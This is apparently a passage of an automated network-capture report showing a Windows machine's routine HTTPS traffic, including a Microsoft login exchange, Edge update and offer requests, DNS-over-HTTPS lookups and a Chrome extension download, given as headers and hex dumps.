2024-09-06 07:58:04 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-09-06 07:58:04 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49714	20.190.160.22	443

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:58:03 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4775 Host: login.live.com
2024-09-06 07:58:03 UTC	4775	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-09-06 07:58:04 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Fri, 06 Sep 2024 07:57:04 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C553_BL2 x-ms-request-id: f5a4845e-747a-4af1-90c9-336f759bef65 PPServer: PPV: 30 H: BL02EPF0001D983 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Fri, 06 Sep 2024 07:58:03 GMT Connection: close Content-Length: 11409
2024-09-06 07:58:04 UTC	11409	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49735	94.245.104.56	443	2332	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:58:16 UTC	428	OUT	GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1 Host: api.edgeoffer.microsoft.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-09-06 07:58:16 UTC	584	IN	HTTP/1.1 200 OK Content-Length: 0 Connection: close Content-Type: application/x-protobuf; charset=utf-8 Date: Fri, 06 Sep 2024 07:58:16 GMT Server: Microsoft-IIS/10.0 Set-Cookie: ARRAffinity=990f03dcbfce000294e864b1676ff62b24b284f2b44f33fef321aa8373d2288e;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com Set-Cookie: ARRAffinitySameSite=990f03dcbfce000294e864b1676ff62b24b284f2b44f33fef321aa8373d2288e;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9 X-Powered-By: ASP.NET

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49756	172.64.41.3	443	2332	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:58:19 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-09-06 07:58:19 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-09-06 07:58:20 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 06 Sep 2024 07:58:20 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8bece9cf5a9441cf-EWR alt-svc: h3=":443"; ma=86400
2024-09-06 07:58:20 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 b1 00 04 8e fb 28 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom()

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49755	172.64.41.3	443	2332	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:58:19 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-09-06 07:58:19 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-09-06 07:58:20 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 06 Sep 2024 07:58:20 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8bece9cf4a034392-EWR alt-svc: h3=":443"; ma=86400
2024-09-06 07:58:20 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 89 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom c)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49757	162.159.61.3	443	2332	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:58:19 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-09-06 07:58:19 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-09-06 07:58:20 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 06 Sep 2024 07:58:20 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8bece9cf5feb7295-EWR alt-svc: h3=":443"; ma=86400
2024-09-06 07:58:20 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 d9 00 04 8e fa b0 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49762	142.250.64.97	443	2332	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:58:21 UTC	594	OUT	GET /crx/blobs/AY4GWKBMNax_FQrZEVzNkO_0mu3UShnzR6AihR_EPjVIUOT_pwZzkWCpOk8YKIu0qnIq_YObWXuPyiJ7NA0nDjMHUEYIIEknsNvJHXuPd0MqxESzoxi9xiMyJKNwZiVV1yEAxlKa5UVe61sINARQ7fO9dE0bkfP_W4GG/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_80_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-09-06 07:58:21 UTC	566	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 135751 X-GUploader-UploadID: AD-8ljuzdLQVyH6DAyAqZjpQriTE1QYBUQqfnDuJ7cdKS-WaNOioa6wWszLLM5uNOiJlydoF0_Y X-Goog-Hash: crc32c=IDdmTg== Server: UploadServer Date: Thu, 05 Sep 2024 17:56:59 GMT Expires: Fri, 05 Sep 2025 17:56:59 GMT Cache-Control: public, max-age=31536000 Age: 50482 Last-Modified: Tue, 23 Jul 2024 15:56:28 GMT ETag: 1d368626_ddaec042_86665b6c_28d780a0_b2065016 Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-06 07:58:21 UTC	824	IN	Data Raw: 43 72 32 34 03 00 00 00 e8 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2024-09-06 07:58:21 UTC	1390	IN	Data Raw: cb 30 5e ae fd 8f bf fc 18 3f ab aa ce 6f f5 9f 86 ea f3 4f e7 8b aa 7e fc f9 c7 ed f2 de 57 f2 ef e5 b5 1f ab 7e fc f1 97 7f fc 18 f2 a7 ba e6 52 7f be 7a 86 4d 61 da 86 e0 b6 91 9a 75 5d 9a b5 2a 9f 87 2d b7 6e 97 ac 9b be 32 73 3c 97 a6 da 8a e4 b0 45 fb 9f 36 ba 3c 2e c2 57 bd 48 91 71 68 ae 17 fd f9 3a 6a a8 79 f8 fe f7 4e dd 44 1a 5d 4e 6a fc f5 d0 bb b5 f4 df 2f a7 cb 61 8a 9a f7 7b e9 db fd f7 67 ca ce f9 92 d0 b9 66 29 ba 7e 7f 5f 98 88 8b a7 31 71 fe fe 4c da 11 23 06 47 da 8d 8d f0 51 97 77 14 c8 99 1d 4a 10 22 04 c4 8e 74 e1 33 0f c2 4d e5 0b 5b 3c 43 e7 18 dc 2e a5 0f 8d 7c 77 d8 1e 94 73 2b 4c 54 17 3e 9b 8f 26 ec 8e 26 50 a5 85 6a 61 ea eb 6e 98 0b 73 73 39 ee c2 67 61 3a ff 1e e7 f7 b3 85 53 ee a9 9e 59 f5 3e 81 0c 1d b9 f8 4a 3a 06 39 87 Data Ascii: 0^?oO~W~RzMau]*-n2s<E6<.WHqh:jyND]Nj/a{gf)~_1qL#GQwJ"t3M[<C.\|ws+LT>&&Pjanss9ga:SY>J:9
2024-09-06 07:58:21 UTC	1390	IN	Data Raw: fb 44 b0 b4 75 cd a2 45 f6 da fb af bc 3f ce 66 36 89 54 f7 7b 85 4d 64 18 16 65 30 97 1e f2 8b 3d 8c f3 00 e1 48 79 96 ec ea 1d f6 a0 d6 80 10 97 4f 10 60 43 7e 2d de bf 3f ac f5 dc 1b 32 87 63 d4 2b 25 8c c9 3d 52 f4 88 e8 d8 51 25 77 c5 5e 7a c9 5e 86 25 15 31 06 d8 2d 7b ad d1 54 eb 11 a3 53 14 2c cf 7d f9 ff d0 e0 b2 c1 43 66 d4 4a 06 e2 33 37 55 9a 78 d1 48 02 d7 8b 1b d1 0b 33 cc 70 a7 4b c1 72 2f c2 13 19 ed c4 5b a9 a0 8b 4d b9 59 5e 7b 72 2d ff 51 fb dc 0d f6 85 87 e6 ba 95 5e 68 12 00 3b 14 08 91 1b c3 91 cc 5a 03 7c cc a3 e0 a7 19 9b 8f 07 0b 70 9c 51 bc af ba f7 c7 22 7f 6b ed da 1b 3c a4 60 9b 5a c3 ab 54 de 7c 82 75 4b 00 a2 d8 aa 43 9d 31 12 d1 82 59 67 1d aa fb 81 1f 1b e0 15 11 e5 97 16 34 8b 65 ef 77 cd 57 b2 c7 ad ba 65 8d f2 aa de 35 Data Ascii: DuE?f6T{Mde0=HyO`C~-?2c+%=RQ%w^z^%1-{TS,}CfJ37UxH3pKr/[MY^{r-Q^h;Z\|pQ"k<`ZT\|uKC1Yg4ewWe5
2024-09-06 07:58:21 UTC	1390	IN	Data Raw: a3 3a 66 63 2b dc 55 dd f4 76 4a 8c 67 19 c8 cf dc c0 a9 f6 5c fb 04 0e 30 9f 45 2b 3a 9d 3b 96 d8 5b 6e bd d6 e7 9c e8 c6 a6 3c ec 04 3f 00 02 d8 07 6a 07 4f 70 bb e6 0d 44 84 8e 31 f6 ed 3b e9 6a c5 3d 68 26 0c d9 55 07 3f b0 ae cd 25 f6 a5 bf 92 bd 1a 68 de 40 51 36 ee a5 e4 ce 91 50 6c c6 16 de 88 4e bc 66 c4 fd 22 da f5 e3 d6 a9 11 77 9e cc c8 00 69 5f 40 62 95 20 df ff 5c 62 ff d0 7c 77 74 a5 ee 94 81 37 09 f8 6e 89 76 d0 cc c3 9e ed f1 98 74 e8 44 3c ad 43 b4 7d 7c ef 37 12 7f b8 65 96 f8 5e 7f 6d d6 87 cf c8 3f 3c ff 0f fe 46 0a 5c ba b6 fe 19 70 0e 32 75 0d ee 8d af b1 e1 04 85 42 3c 9e 59 9b c0 78 a6 b0 b5 39 1f b7 d1 de cd 12 22 41 49 d1 15 ab a1 11 33 5c d4 fd b2 5b d9 73 15 d6 f9 35 bc c7 cd bb 1d 79 b6 97 eb f1 e5 7e 9d 14 50 5d 28 7c 07 9c Data Ascii: :fc+UvJg\0E+:;[n<?jOpD1;j=h&U?%h@Q6PlNf"wi_@b \b\|wt7nvtD<C}\|7e^m?<F\p2uB<Yx9"AI3\[s5y~P](\|
2024-09-06 07:58:21 UTC	1390	IN	Data Raw: f4 82 39 aa e0 7a ec d0 f9 66 30 94 41 fc df ee db 1c a9 13 e6 2d 30 13 82 a1 ce 12 31 7d 82 53 e2 83 47 45 59 27 58 b8 8f 29 06 91 69 cf 5a f8 cc 88 c6 0f 64 a8 24 03 ce ef 34 a6 34 d9 53 76 aa d1 f7 b6 0a 2b fc d4 75 76 ce 3a 75 4f 2d 57 df f3 bf de ff fb dd 66 83 81 23 92 f4 b0 c9 4d 75 c1 14 7c 9e f8 b8 ab 3c 75 20 0d 34 51 a3 0e b9 57 8f 5c c9 54 10 9d 35 cc 9b 85 ba 8d ce d3 40 ea df eb f4 bd c6 2c 8d bf 7f cb f8 66 fe ef 5a ba 1d ba 7f 9e b7 3c ff e1 39 cb 7f 7d 77 90 3e 1b 53 53 b5 ff 3a 2b 59 eb 1a b5 ef 9a f3 97 e0 e3 a3 e0 8e ca 4c fb 5e 74 ea 56 74 b6 f6 9f d3 57 e1 d7 9f b9 df 5e fe f7 bb 96 ae e7 1e 0d df 6b e7 fb 2c e6 b1 79 7f 1c 1b ef fb ff 1f ba be 0c 5d 77 5f 05 74 4c cd 62 ce b9 d6 b7 e6 3a 9d e3 7f 1f 1a cd c7 fb 67 75 fb f1 97 bf fe Data Ascii: 9zf0A-01}SGEY'X)iZd$44Sv+uv:uO-Wf#Mu\|<u 4QW\T5@,fZ<9}w>SS:+YL^tVtW^k,y]w_tLb:gu
2024-09-06 07:58:21 UTC	1390	IN	Data Raw: ad 33 4d c7 0c 67 6e 81 d6 1e 0c 0b 79 e1 e5 4a 9e 81 e8 0e 6d e9 ca e1 60 fa 07 7f fa d2 b1 1f f7 7b ac 3f 4a 13 55 ac f1 4c 7f 94 cf f0 fa f1 b6 7e 2d 9f 5f f6 86 cc fe f1 ec 09 fd 70 24 26 57 1c cf 8f 61 96 f1 4e 24 37 5b 2c f1 37 09 ff 3e 8d 4e e3 76 3b 30 89 99 dc ba 80 99 fa f5 86 7a ab 17 00 10 99 70 d6 78 75 3f ec 5d 26 c0 29 73 23 b1 4d 01 b1 bd 85 22 65 c6 ae 4d 05 29 bb 19 a4 97 d3 26 50 39 76 5a 02 7b 3b 5c cd 19 16 9a 34 6a ca 98 31 83 a3 30 c0 8d 8b 90 69 14 2e 18 a7 11 fc 43 a4 1b 50 25 a6 9a b3 38 b3 01 a7 ed 89 86 13 1f da e6 66 69 88 9b 9b cb a3 0e 88 10 49 34 ac c5 ac 87 cc 0e df 3a 83 59 3f 4a c7 9a 9c 4a 52 22 4a 73 50 10 93 5b 04 26 5d e4 1b 03 5e 57 1d b5 9f 07 15 ea 11 56 a2 32 1c 57 08 4b 8e 3a dd 14 09 a5 9a 54 87 09 2c df 70 99 Data Ascii: 3MgnyJm`{?JUL~-_p$&WaN$7[,7>Nv;0zpxu?]&)s#M"eM)&P9vZ{;\4j10i.CP%8fiI4:Y?JJR"JsP[&]^WV2WK:T,p
2024-09-06 07:58:21 UTC	1390	IN	Data Raw: 34 3d 97 d3 d8 25 32 96 b3 f5 13 f7 6e 04 c3 e8 d7 24 af 68 00 67 eb c3 66 e7 0c 80 f3 86 ed 66 61 be 93 2c c1 a2 81 5f 40 75 19 01 ec 81 b2 11 59 6b 02 01 7c 80 cd 06 9c b7 f6 39 2e 1b a2 d1 59 0b 31 ae 2b a8 f9 19 97 78 ba 9e 92 04 eb 38 0f b1 da 61 42 cf b8 b8 ab 80 50 16 da 7c e0 2a 5d 2e b6 61 3d 16 a7 f7 ad 25 37 09 0c 17 4a fa a3 b0 2f 74 b2 60 63 c4 b5 32 fd ca 4b dc 91 50 cd 08 cf a1 3e ef 10 50 75 05 0f a4 06 bb 61 21 1b 94 db 98 9a 6d 25 ee 69 db 2b 4b 9f 80 46 c6 7a 5d 13 fe 95 45 1a 44 be bd d3 f7 20 9f 7f 88 83 9f 5b 5b 41 3d 0c 7f 6e 6e 02 8a 0a a9 66 0f 64 38 ff 27 1a e0 86 95 3d 0e 65 8e 2a 9e ff b3 5a f5 13 b7 6b 4c e2 da dd 53 96 36 98 be 35 e0 8b a2 03 ec 6d 83 0f 98 a6 6a 9a 7d d4 30 cf b9 22 24 be 95 ed ae b5 82 4d 0c 6d 44 68 ea 50 Data Ascii: 4=%2n$hgffa,_@uYk\|9.Y1+x8aBP\|].a=%7J/t`c2KP>Pua!m%i+KFz]ED [[A=nnfd8'=eZkLS65mj}0"$MmDhP
2024-09-06 07:58:21 UTC	1390	IN	Data Raw: 87 c6 bc 81 e5 c6 01 f8 80 6e be 68 ae 8d 1a 92 d9 22 7c fb 47 cd 55 a8 b9 72 2b d4 f6 c4 b2 bb dd a3 21 3e c1 52 53 40 cc 0f 98 69 56 28 ab c0 b8 20 06 f5 02 9a 6f 68 bf 82 e6 8f 24 99 81 79 93 8e d4 f5 47 b4 3f 91 f0 93 e1 db ea 74 d9 df bc 02 e8 81 b4 53 49 59 03 c4 1b 90 6e de 93 27 17 a4 fa 97 68 50 4b ef a1 19 2a b3 8e 70 02 6b db 66 44 24 b0 33 79 cf de 43 b1 cd cd c3 41 86 8d 22 07 8e 36 37 b7 cc 9f 0b de bb 60 25 1c fe f7 ea 9b 07 c5 80 f6 9d 10 df 4c b8 27 ef 1c 14 d6 c4 c3 c8 1c ee dd 3d 4d da 8a 0c c4 52 71 54 0a cc 3d d5 5f 29 07 02 fd 8d 5b 75 1c 35 30 b0 47 f8 b3 f1 28 6e 46 7c 56 31 fc 89 c5 6c ca aa 76 67 10 f7 66 c9 bd 26 86 fd fd 33 5d db d6 b3 31 ae 67 3e af 13 4c ea cf 63 28 1c 73 d5 b7 cf 2e dd b8 9a fa 75 a8 12 83 1e ae 82 